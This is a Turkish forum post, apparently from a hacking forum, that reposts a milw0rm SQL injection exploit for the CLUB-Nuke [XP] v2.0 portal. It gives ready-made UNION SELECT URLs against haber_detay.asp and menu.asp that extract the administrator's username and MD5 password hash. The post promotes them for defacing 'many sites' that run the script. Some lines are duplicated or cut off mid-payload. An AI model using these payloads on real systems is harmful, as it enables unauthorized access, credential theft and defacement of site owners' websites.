Selamlar;
Aşağıdadaki exploit ile clupnuke portal sistemini kullanan bir çok siteye index atabilirsiniz.
Bu kod ile adminin nickini öğreniyoruz.
Bu kod ilede şifresinin md5 hashli halini alıyoruz.
NOT: Yalnızca clup nuke scriptini kullanan siteler için geçerli
Aşağıdadaki exploit ile clupnuke portal sistemini kullanan bir çok siteye index atabilirsiniz.
Kod:
# CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version) SQL Injection Vulnerability
# Risk : High
# Credit : ASIANEAGLE
# Contact: [email protected]
# Web : www.asianeagle.org
# Download Link : http://www.aspindir.com/Kategoriler/asp/portal-&-hazir-site/?P=7&K=&T=
#Exploit:
Note : User Logins Must Be Enabled By Admin To Exploit This Vulnerability
#Admin Nick: http://[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_ADI,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201
#Admin Password :http::[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_SIFRE,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201
after login as user;
#Admin Nick : http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_ADI,3,4,5%20from%20UYELER%20where%20U_ID%20like%201
#Admin Password: http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_SIFRE,3,4,5%20from%20UYELER%20where%20U_ID%20like%201
#Forever milw0rm ;)
# milw0rm.com [2006-08-08]Bu kod ile adminin nickini öğreniyoruz.
Kod:
http://hedefsite/club-nuke nin kurulu olduğu dizin/haber_detay.asp?haber_id=-1%20union%20selectBu kod ilede şifresinin md5 hashli halini alıyoruz.
Kod:
http://hedefsite]/club-nuke nin kurulu olduğu dizin/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_SIFRE,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201NOT: Yalnızca clup nuke scriptini kullanan siteler için geçerli